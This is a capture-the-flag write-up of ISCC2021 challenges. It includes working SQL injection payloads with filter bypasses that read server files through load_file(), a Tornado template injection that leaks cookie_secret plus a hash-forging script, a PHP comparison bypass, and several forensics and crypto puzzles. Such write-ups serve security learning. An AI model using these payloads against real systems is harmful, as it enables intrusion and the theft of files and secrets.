ISCC2021 - reproduction of some topics

Posted by ATLien on Tue, 08 Feb 2022 02:18:25 +0100

Practice questions

easyweb

This problem obviously needs SQL injection, but the injection point is not known at first.
After testing, the injection point turns out to be a single quote ('), and the comment symbol is written as %23 (#).
Further testing shows that spaces are filtered; %0d (carriage return) works as a separator instead.
union and select are filtered as well. Since the filter strips each keyword in a single pass, double-writing them (ununionion, selselectect) leaves the original keyword behind.
payload
?id=0'%0dununionion%0dselselectect%0d1,2,3%23
This reveals the display positions.
Following the usual pattern, extract the database name:

?id=0'%0dununionion%0dselselectect%0d1,database(),3%23


Next, extract the table name. Testing shows that from and information_schema are also filtered:

1. from: try double-writing or a change of case to bypass the filter.
2. information_schema: if it cannot be bypassed, look for another schema that exposes the same information. The version is 5.7.33, so the sys schema exists and its views can be used to look up table names.


Construct the payload
?id=0'%0dununionion%0dselselectect%0d1,(selselectect%0dgroup_concat(table_name)%0dFROM%0dsys.schema_table_statistics_with_buffer),3%0d%23

This returns the table name.
The same table name can also be read from another sys view:
?id=0'%0dununionion%0dselselectect%0d1,(selselectect%0dgroup_concat(table_name)%0dFROM%0dsys.schema_auto_increment_columns),3%0d%23
The table name is iscc_flag.
Blindly guess that the column name is flag.
Construct the payload

?id=0'%0dununionion%0dselselectect%0d1,(selselectect%0dflag%0dfrom%0discc_flag),3%0d%23
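To make the double-write trick concrete, here is an added example (not code from the original writeup or from the challenge) that models the filter the payloads above imply: each blacklisted token is deleted in one case-sensitive, non-recursive pass, which is why "ununionion" survives as "union" and why uppercase FROM gets through. The blacklist and the single-pass behaviour are assumptions; the challenge's real filter source is not shown on the page. The example also shows the recursive variant of the filter, under which double-writing no longer works.

```python
import urllib.parse

# Assumed filter: the tokens the page found to be blocked, removed in a single
# case-sensitive pass (like a chain of str_replace() calls). This is a model
# built for illustration, not the challenge's actual source.
BLACKLIST = ("union", "select", "from", "information_schema", " ")


def strip_once(query: str) -> str:
    """Single-pass blacklist removal: every occurrence of each token is deleted once."""
    for token in BLACKLIST:
        query = query.replace(token, "")
    return query


def strip_until_stable(query: str) -> str:
    """Recursive removal: keep stripping until nothing changes, so nested keywords die too."""
    while True:
        stripped = strip_once(query)
        if stripped == query:
            return stripped
        query = stripped


def double_write(keyword: str) -> str:
    """Nest the keyword inside itself: 'union' -> 'ununionion', 'select' -> 'selselectect'."""
    half = len(keyword) // 2
    return keyword[:half] + keyword + keyword[half:]


def build_payload(column_expr: str) -> str:
    """Value of the id parameter in the page's style: %0d as separator, %23 as comment,
    column_expr placed in the second (displayed) column."""
    sep = "%0d"
    return ("0'" + sep + double_write("union") + sep + double_write("select")
            + sep + "1," + column_expr + ",3" + sep + "%23")


def as_seen_by_db(param_value: str, recursive: bool = False) -> str:
    """URL-decode the parameter and run it through the modelled filter."""
    decoded = urllib.parse.unquote(param_value)  # %0d -> '\r', %23 -> '#'
    return strip_until_stable(decoded) if recursive else strip_once(decoded)


if __name__ == "__main__":
    probe = "0'%0dununionion%0dselselectect%0d1,2,3%23"
    print(repr(as_seen_by_db(probe)))                  # keywords restored
    print(repr(as_seen_by_db(probe, recursive=True)))  # keywords gone
    sub = ("(" + double_write("select") + "%0dgroup_concat(table_name)%0dFROM"
           + "%0dsys.schema_table_statistics_with_buffer)")
    print(repr(as_seen_by_db(build_payload(sub))))
```

The recursive variant shows why a blacklist is never a real fix: it closes this specific trick, but the correct defence is a parameterised query, which removes the need to filter keywords at all.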


Opening that page gives the source code to analyze:

<?php

if(isset($_GET['c'])){
    $c = $_GET['c'];

    if(preg_match("/[zxcvbMnlkjhgfsaoiuytreq]+|[ZXCVBNLKKJHGFSAOIUYTREQ]+|[0123456789]+|\(|\/|\*|\-|\+|\.|\{|\}|\[|\]|\'|\"|\?|\>|\<|\,|\)|\(|\&|\^|\%|\#|\@|\!/", $c)){
        exit("die!!");
    }else{
        echo `$c`;   // backticks: the parameter is executed as a shell command
    }

}else{
    highlight_file(__FILE__);
}
?>

At first glance nothing gets through. Comparing the 26 letters of the alphabet with the filtered set zxcvbMnlkjhgfsaoiuytreq shows that the lowercase letters d, m, p and w are not filtered (the character class contains capital M, not m).
Those letters are enough to spell pwd; since the backticks execute the parameter as a shell command, ?c=pwd prints the current directory, which is the path of the web files.
With the flag's location known, read it through the SQL injection with load_file():
?id=0'%0dununionion%0dseselectlect%0d1,(load_file('/var/www/const/flllllllllaaag.php')),3%0d%23


Or
?id=-1'%0dununionion%0dselselectect%0d1,(load_file('/etc/apache2/sites-available/000-default.conf')),3%23
This is Apache's default virtual host configuration path, and reading it gives the site path.


The flag can then be seen in the source code.

tornado


Browsing the files at the three paths: flag.txt in /fllllaaaaaag holds the flag;
welcome.txt hints at the render function, and a search shows that Tornado's render function is subject to template injection;
hints.txt tells us the hash is md5(cookie_secret+md5(filename)), so we need MD5.

Look at the hints.txt path:

http://39.96.91.106:7060/file?filename=/hints.txt&filehash=c61a0774797a56fc60854ac778aa3d15

There is a filehash parameter. According to the hint, its value is the MD5 described above, and computing it also requires cookie_secret. This step is the same as in an earlier challenge of the same type, which another author has explained clearly.
Construct the payload

error?msg={{handler.settings}}


This leaks cookie_secret from the handler settings; with it we can calculate the hash value.
Script from that author:

import hashlib


def md5encode(data: bytes) -> str:
    """Return the hex MD5 digest of a byte string."""
    m = hashlib.md5()
    m.update(data)
    return m.hexdigest()


# filehash = md5(cookie_secret + md5(filename)); the secret was leaked via {{handler.settings}}
name = '/fllllllllllllaaaaaag'
secret = 'ef57c331-744f-4528-b434-9746317d4f6a'
name = name.encode()
bb = md5encode((secret + md5encode(name)).encode())
print(bb)

Li Hua's red envelope


Opening the file in 010Editor shows

24,43,13,13,12,21,43

Trying it out, this looks like tap code.

Decoding it gives the flag: ISCCBFS
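Tap code is a Polybius square: each letter is sent as a row count and a column count, and K is folded into C so the grid stays 5x5. The following decoder is an added example, not part of the original writeup; the only input it takes from the page is the list of digit pairs, which it reads as row/column indices. It also encodes in the other direction and accepts the raw knock form (groups of dots), which is an extension of what the page shows.

```python
# 5x5 tap-code grid. K is missing and is sent as C.
TAP_GRID = ("ABCDE", "FGHIJ", "LMNOP", "QRSTU", "VWXYZ")

SAMPLE = "24,43,13,13,12,21,43"  # the digit pairs seen in 010Editor on the page


def decode_tap(pairs: str) -> str:
    """Decode comma-separated two-digit row/column pairs such as '24,43'."""
    letters = []
    for token in pairs.replace(" ", "").split(","):
        if len(token) != 2 or not token.isdigit():
            raise ValueError("expected a two-digit row/column pair, got %r" % token)
        row, col = int(token[0]), int(token[1])
        if not (1 <= row <= 5 and 1 <= col <= 5):
            raise ValueError("row/column out of range in %r" % token)
        letters.append(TAP_GRID[row - 1][col - 1])
    return "".join(letters)


def encode_tap(text: str) -> str:
    """Encode letters back into row/column pairs; K is mapped to C."""
    pairs = []
    for ch in text.upper():
        if ch == "K":
            ch = "C"
        for r, row in enumerate(TAP_GRID, start=1):
            if ch in row:
                pairs.append("%d%d" % (r, row.index(ch) + 1))
                break
        else:
            raise ValueError("cannot encode %r" % ch)
    return ",".join(pairs)


def decode_tap_knocks(knocks: str) -> str:
    """Decode the raw knock form: dots for taps, one space between row and column,
    two spaces between letters, e.g. '.. ....  .... ...' -> 'IS'."""
    pairs = []
    for letter in knocks.split("  "):
        row, col = letter.split(" ")
        pairs.append("%d%d" % (len(row), len(col)))
    return decode_tap(",".join(pairs))


if __name__ == "__main__":
    print(decode_tap(SAMPLE))   # ISCCBFS
```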

Mirage-1

Opening the document shows nothing useful, so change the document's extension to zip.

Inside the archive is the flag.

Beauty trick

Opening the file, the hint is given as a picture.

This is obviously AES encryption, and the key is ISCC2021.
The document contains a QR code; scanning it gives the following string.

U2FsdGVkX1/Ka+sScszwQkwhO+VLiJwV/6IFg5W+TfNHGxG2qZsIr2iwMwb9X9Iu 3GuGWmPOtO27z8vNppD2D50fwsD+8VWhdtW9J4cewYivH/Z/7GoUvcJXJMrvf+vu +CBqWDGp6HWd0e5whGhuzlK0ZtBcDZdPDSIHA7+GuUlifp8PcFCtJPgiuk143REE +pKFiSJXolXLR1vJCdGY9w5mXFbiWPrb2U7r/v5noP8=

Decrypting three times gives the string: y0u_h@ve_fal1en_intO_tHe_tr@p_0f_tHe_be@uty_ !

That was a trap!!
Change the Word document into a compressed package; in ny4w1nbmry4m.zip\word\media there are two images.
One of them is the QR code from above; the other is a second QR code, whose scan result is

U2FsdGVkX19eOY/pDh8+vPAcvfkLi1XLUneVzjLLOMul53sKK8UpobdCOiPIv4KE


AES decryption fails this time, so try DES instead; that gives the flag.
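Both strings above start with U2FsdGVkX1, which is the base64 of the 8-byte marker "Salted__": the container that OpenSSL and CryptoJS produce when a cipher is driven by a passphrase instead of a raw key. The passphrase and the 8-byte salt that follows the marker are turned into key and IV with OpenSSL's EVP_BytesToKey (MD5, one round), and the remainder is CBC ciphertext with PKCS#7 padding. The example below is added here and is not code from the writeup or the challenge: it parses the container, derives key and IV for either cipher, and checks the block alignment, which is a quick way to see which of AES and DES a blob can even be. The same container format reappears in flag.txt of the "Xiao Ming's pet picture" task later on this page. The decryption helper assumes pycryptodome is installed; the parsing and key derivation need only the standard library.

```python
import base64
import hashlib

# Ciphertexts copied from the page: the first QR code (solved with AES, key ISCC2021)
# and the second QR code from word\media (solved with DES).
AES_B64 = ("U2FsdGVkX1/Ka+sScszwQkwhO+VLiJwV/6IFg5W+TfNHGxG2qZsIr2iwMwb9X9Iu"
           "3GuGWmPOtO27z8vNppD2D50fwsD+8VWhdtW9J4cewYivH/Z/7GoUvcJXJMrvf+vu"
           "+CBqWDGp6HWd0e5whGhuzlK0ZtBcDZdPDSIHA7+GuUlifp8PcFCtJPgiuk143REE"
           "+pKFiSJXolXLR1vJCdGY9w5mXFbiWPrb2U7r/v5noP8=")
DES_B64 = "U2FsdGVkX19eOY/pDh8+vPAcvfkLi1XLUneVzjLLOMul53sKK8UpobdCOiPIv4KE"

# (key length, IV length, block size) in bytes for CryptoJS passphrase mode
CIPHER_PARAMS = {"aes": (32, 16, 16), "des": (8, 8, 8)}


def parse_salted(b64_text: str):
    """Split an OpenSSL/CryptoJS 'Salted__' container into (salt, ciphertext)."""
    raw = base64.b64decode("".join(b64_text.split()))  # QR scans may carry spaces
    if raw[:8] != b"Salted__":
        raise ValueError("not a Salted__ container")
    return raw[8:16], raw[16:]


def evp_bytes_to_key(passphrase: bytes, salt: bytes, key_len: int, iv_len: int):
    """OpenSSL EVP_BytesToKey with MD5 and one iteration: D_i = MD5(D_{i-1} + pass + salt)."""
    material = b""
    block = b""
    while len(material) < key_len + iv_len:
        block = hashlib.md5(block + passphrase + salt).digest()
        material += block
    return material[:key_len], material[key_len:key_len + iv_len]


def container_fits(b64_text: str, cipher: str) -> bool:
    """Sanity check before decrypting: the ciphertext must be whole blocks of that cipher."""
    _, ct = parse_salted(b64_text)
    return len(ct) > 0 and len(ct) % CIPHER_PARAMS[cipher][2] == 0


def decrypt_salted(b64_text: str, passphrase: str, cipher: str = "aes") -> bytes:
    """CBC-decrypt a Salted__ container with a passphrase (requires pycryptodome)."""
    from Crypto.Cipher import AES, DES
    from Crypto.Util.Padding import unpad
    key_len, iv_len, block = CIPHER_PARAMS[cipher]
    salt, ct = parse_salted(b64_text)
    key, iv = evp_bytes_to_key(passphrase.encode(), salt, key_len, iv_len)
    mod = AES if cipher == "aes" else DES
    return unpad(mod.new(key, mod.MODE_CBC, iv).decrypt(ct), block)


def decrypt_repeatedly(b64_text: str, passphrase: str, rounds: int = 3, cipher: str = "aes") -> str:
    """The page decrypted the first blob three times, which presumably means each
    plaintext was itself another Salted__ blob (an assumption of this example)."""
    data = b64_text
    for _ in range(rounds):
        data = decrypt_salted(data, passphrase, cipher).decode()
    return data


if __name__ == "__main__":
    for name, b64 in (("aes", AES_B64), ("des", DES_B64)):
        salt, ct = parse_salted(b64)
        print(name, "salt=%s ciphertext=%d bytes fits=%s"
              % (salt.hex(), len(ct), container_fits(b64, name)))
```

Note that the block-alignment check only rules ciphers out: the second blob is 32 bytes of ciphertext, which fits both AES and DES, so as on the page it still has to be tried with each.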

What's my discount

After downloading, run the exe file to get a string:
pass1{\u006b\u0072\u0077}, which is Unicode escape encoding and decodes to pass1{krw}
Open the compressed package in 010Editor; at the end is

cGFzczJ7Z2NjNjY2fQ==

which is base64 for pass2{gcc666}
The combined password krwgcc666 unpacks the archive, which contains

eW91Zm91bmRtZT8=

which is base64 for: youfoundme?
Next there is a file in MP3 format. MP3 steganography is usually extracted with MP3Stego, using the password youfoundme?
This gives ISCC{LFXXK4TENFZWG33VNZ2DELRRGU======

The inner string is base32; decoding it gives Yourdiscount2.15.

Check it

After decompressing there is a picture; use binwalk to extract what is hidden in it.
Opening the extracted document shows a string of 0s and 1s.
Treat the 01 string as pixels and draw a QR code from it.
The string is 841 characters long, which is exactly 29 squared, so it should be a 29x29 QR code.

from PIL import Image

MAX = 29    # 841 bits of 0/1, so the image is 29 x 29
pic = Image.new("RGB", (MAX, MAX))
# If the scanner fails, the colours may be inverted: swap (255,255,255) and (0,0,0) below.
bits = "1111111000100100110000111111110000010011011110010101000001101110100111010011010010111011011101000000111011110101110110111010010111101110001011101100000101110111000010010000011111111010101010101010111111100000000011100100110100000000100101101110000101010101000001101000011101011011011100101000001110010010001111011110010001100000101101100111111001010110101101110000100011110100110001001100010010101110000111111111110010100110101001111110010110001100110111110111000110011110010001111001110000100011010000110100100000001011001010101101110100011011010011100011101001111011111000101001101101101100101010001111101000000000011101101101010001011011111110000011110000101011010100000101011110010101000101101011101001010011001011111001010111010110101111000001101001101110100101010000010100111011000001000011101000011001001011111110100100100000111100110"
if len(bits) != MAX * MAX:
    raise ValueError("expected %d bits, got %d" % (MAX * MAX, len(bits)))
i = 0
for y in range(0, MAX):
    for x in range(0, MAX):
        if bits[i] == '1':
            pic.putpixel((x, y), (0, 0, 0))        # '1' -> black module
        else:
            pic.putpixel((x, y), (255, 255, 255))  # '0' -> white module
        i = i + 1
pic.show()
pic.save("./flag.png")

Get QR code scanning

Xiao Ming's pet picture

The download is a picture.
Extract it with binwalk to get flag.txt and key.zip.
flag.txt is U2FsdGVkX18kNy7RlBvcV9WJsqa+oxvdd0Ir86U2cU2996N6ltZi7VVOaw==
Obviously a key is needed to decrypt it.

Opening key.zip shows that key.txt is only 5 bytes in size. Combined with the rabbit's hint that a collision is needed, this should be a CRC32 collision. Trying it, the key is (0_0).
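A zip archive stores the CRC-32 and the uncompressed size of every entry in the clear, even when the entry is encrypted, and for a 5-byte file a CRC-32 can simply be brute-forced. The example below is added here and is not code from the writeup: since the real key.zip is not reproduced on the page, it builds a stand-in archive in memory containing the 5-byte key the page found, reads the CRC and size back out of it, and brute-forces the key over a small character set. The character set and the in-memory archive are constructed for the demonstration.

```python
import io
import itertools
import zipfile
import zlib


def build_sample_zip(key: bytes = b"(0_0)") -> bytes:
    """Constructed stand-in for the page's key.zip: one entry, key.txt, holding the key."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("key.txt", key)
    return buf.getvalue()


def crc_and_size(zip_bytes: bytes, name: str):
    """Read the stored CRC-32 and uncompressed size of one entry; no password needed."""
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        info = zf.getinfo(name)
    return info.CRC, info.file_size


def crc32_collide(target: int, length: int, charset: bytes):
    """Return the first `length`-byte string over `charset` whose CRC-32 equals `target`.
    Cost is len(charset) ** length: 95 ** 5 printable bytes is far too slow for pure
    Python, so narrow the charset or use a compiled brute-forcer for real archives."""
    for cand in itertools.product(charset, repeat=length):
        s = bytes(cand)
        if zlib.crc32(s) == target:
            return s
    return None


def verify_key(zip_bytes: bytes, key: bytes, name: str = "key.txt") -> bool:
    """Check a candidate against the archive: same length and same CRC-32."""
    crc, size = crc_and_size(zip_bytes, name)
    return len(key) == size and zlib.crc32(key) == crc


def recover_key(zip_bytes: bytes, name: str = "key.txt", charset: bytes = b"()_0"):
    """Recover the entry's content from its CRC-32 and size. The default charset is a
    constructed toy alphabet for the demo; real runs would use printable ASCII."""
    crc, size = crc_and_size(zip_bytes, name)
    return crc32_collide(crc, size, charset)


if __name__ == "__main__":
    sample = build_sample_zip()
    print(recover_key(sample))   # b'(0_0)'
```

CRC-32 is a 32-bit checksum, not a hash: with 5 printable bytes there are about 95**5 / 2**32, roughly two, inputs per CRC value on average, so a brute-forcer should report every match and let the analyst pick the one that reads like a key. For longer files the search space outgrows brute force quickly, which is why the challenge kept key.txt at 5 bytes.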

Xiao Ming's expression bag


This is clearly a Caesar cipher, but the offset is unknown. Enumerating the offsets shows that it is 13, and the result is a date written in English. Together with the hint, the year is 1999, but the month and day are unknown. The password consists only of digits and is 8 digits long, so Ziperello can brute-force it.



Password obtained: 07071999
The extracted file then cannot be opened, so check it in WinHex: its file header is missing. Add the header back and the picture opens.

arena

ISCC customer service (I)


The votes can be changed directly, but vote stuffing is detected.

Since we can't stuff the ballot, just disable the opponent's voting button!
Open the developer tools in Firefox with F12, edit the page source and delete the opponent's voting button 😼


The opponent has about 50 or 60 votes, so the developer-tools edit has to be done quickly; after the modification it is enough to exceed the opponent's vote count within 20 s.

What is this

Looking at the page source reveals a piece of JS code. Copy it into the browser console and run it.

Web01

Follow the hint and go in to have a look.


This stubborn little temper; let's go in and have a look 😏😏
39.96.91.106:7040/code/code.txt

<?php
// $flag is defined elsewhere in the challenge source

if (isset ($_GET['password'])) {

	// preg_match() returns 0 when the pattern does not match and FALSE only on error,
	// so this branch never rejects a non-alphanumeric password
	if (preg_match ("/^[a-zA-Z0-9]+$/", $_GET['password']) === FALSE)
	{
		echo '<p>You password must be alphanumeric</p>';
	}
	else if (strlen($_GET['password']) < 8 && $_GET['password'] > 9999999)
	{
		if (strpos ($_GET['password'], '*-*') !== FALSE)
		{
			die('Flag: ' . $flag);
		}
		else
		{
			echo('<p>*-* have not been found</p>');
		}
	}
	else
	{
		echo '<p>Invalid password</p>';
	}
}
?>

Auditing the source reveals the author's little secret: preg_match returns 0, not FALSE, when the pattern does not match, so the "must be alphanumeric" check never rejects anything.
The password therefore only has to be shorter than eight characters, compare greater than 9999999, and contain *-*.
In scientific notation 1e9 = 1000000000 > 9999999, and PHP 7 converts the leading-numeric string "1e9*-*" to 1e9 when comparing it with an integer. (PHP 8 compares a non-numeric string with an integer as strings, so this trick depends on the challenge running PHP 7.)
So construct the
payload: 1e9*-*

Topics: Web Development